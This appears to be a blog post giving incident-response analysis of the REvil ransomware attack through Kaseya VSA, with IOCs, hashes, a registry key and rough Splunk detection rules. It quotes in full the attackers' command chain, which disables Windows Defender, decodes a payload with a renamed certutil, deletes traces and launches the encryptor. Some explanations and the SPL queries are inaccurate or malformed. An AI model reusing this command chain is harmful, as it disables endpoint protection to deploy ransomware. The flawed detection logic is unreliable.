• Donald Ashdown

Kaseya MSP Incident Response

As someone who has a history of working for MSP's, today might be one of the most memorable days for the remainder of my life. A very reputble hacking group "Re-evil" has hacked the most used tool by IT companies for device access and administration, "Kaseya". This brings me to learn and produce a an appropriate response to the the attack, and share with others.


I will first go into the basic flow and operation of the attack, and then a deep dive into the IOC's we should look for, and a deeper dive into each one. From here I have worked with the community to develop and create SIEM rules surrounding these attacks. Quite often SIEM or SaaS services will not provide you with the logic behind their custom events, which can leave a security team between a rock and a hard place.


The Kaseya VSA agent will drop a cert file, "agent.crt" in the c:\kworking folder which then gest distributed as a Kaseya updates with the name 'Kaseya VSA Agent Hot-fix'

Powershell is then executed and attempted to decode the certificate 'agent.crt' with the windows certutil.exe bunary. From here is extracts the decoded agent and redirects this in a file named agent.exe within the same folder.

From here the agent.exe is signed using a malicious certificate with MsMpEng.exe and mpsvc.dll embedded into the certificate and it unpacks as MsMoEng.exe and mpsvc.dll in the C:\Windows folder

Below is a screen shot of the agent.exe extracting and launching the embedded files.

MsMPEng.exe is a out of date version of a legitimate Microsoft Defender .exe. which is used as a living off the land binary or LOLBin as the malware does not make callbacks home. So native binaries avoiding triggering SIEM or other detection rule sets,

Specific commands
  • Ransomware encryptor is dropped to c:\kworking\agent.exe

  • The VSA procedure is named "Kaseya VSA Agent Hot-fix”

  • At least two tasks run the following:

"C:\WINDOWS\system32\cmd.exe" /c ping -n 4979 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe

Break down

C:\WINDOWS\system32\cmd.exe" /c ping -n 4979 > nul

  • Specifies arguments to be passed

  • Ping - A command often used for testing communications with another device

  • -n - number of requests to send = 4979

  • > nul - hide the output by redirecting the ping results to nowhere.

& C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

  • Set-MpPreference - Lets you configure preferences for Windows Defender

  • DisableRealtimeMonitoring $true - This command disables windows defender real time monitoring

  • DisableIntrusionPreventionSystem $true - Responsible for network protection against exploitation of known vulnerabilities

  • DisableIOAVProtection $true - Indicates whether Defender will scan downloaded files and attachments.

  • DisableScriptScanning $true - Determines whether to disable scanning scripts during regular scans

  • EnableControlledFolderAccess Disabled - Responsible for blocking unauthorized access to folders

  • EnableNetworkProtection AuditMode -Force - Places windows defender Network Protection into AuditMode, which speculations suggests this hides pop ups or warnings that you may receive if it was switched in an off state.

  • MAPSReporting Disabled - This effectively enables telemtry data to be sent to the Microsoft threat community.

  • SubmitSamplesConsent NeverSend - This effectively tells windows defender not to send threat reporting samples to Microsoft

& copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >>

  • Copies over the cerutil.exe to the C:\windows directory and renames the file to cert.exe

  • Calls cert.exe and

C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe

  • Passing random input to cer.exe and decoding the kaseya crt and redirecting output into agent.exe

& del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe

  • Delete the above certificates and PE files.

Files observed

  • C:\windows\cert.exe

  • 36a71c6ac77db619e18f701be47d79306459ff1550b0c92da47b8c46e2ec0752

  • C:\windows\msmpeng.exe

  • 33bc14d231a4afaa18f06513766d5f69d8b88f1e697cd127d24fb4b72ad44c7a

  • C:\kworking\agent.crt

  • C:\Windows\mpsvc.dll

  • 8dd620d9aeb35960bb766458c8890ede987c33d239cf730f93fe49d90ae759dd

  • C:\kworking\agent.exe

  • d55f983c994caa160ec63a59f6b4250fe67fb3e8c43a388aec60a4a6978e9f1e

Registry Keys

  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\BlackLivesMatter


One of the domains showed up under pastebin, and referenced a config file by the group which returned a larger list of domains used by them.

Interestingly enough the http:// page displays nothing from the community.

However under just the domain name without the prefix, we have a community mention of a pastebin file.

The hash is directly related to their malware.

Below is a brief description of the groups malware.

The domain list related to the Kaseya attack.

Custom Splunk Based SIEM Rules

Domain detection

First create a look up table and load the bad host names.

[|inputlookup bad_domains.csv]

Create a rule that defines log source, and evaluates network logs by hostname, and if the host name equals hostnames in the lookup table, direction output to nothing but iterate a counter based on action counts.

index=(Network logs) source=(Network source)

| eval hostname=name(destinationhostname)

| eval suspicioushost=if(hostname = [lookup table], null)

| fillnull suspicioushost

| stats count by action, suspicioushost

Registry Key Detection

index="windows" sourcetype=WinRegistry disabled = 0 type=set OR type=create OR type=delete OR type=rename key_path="HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\BlackLivesMatter"

File obersavtion

27 views0 comments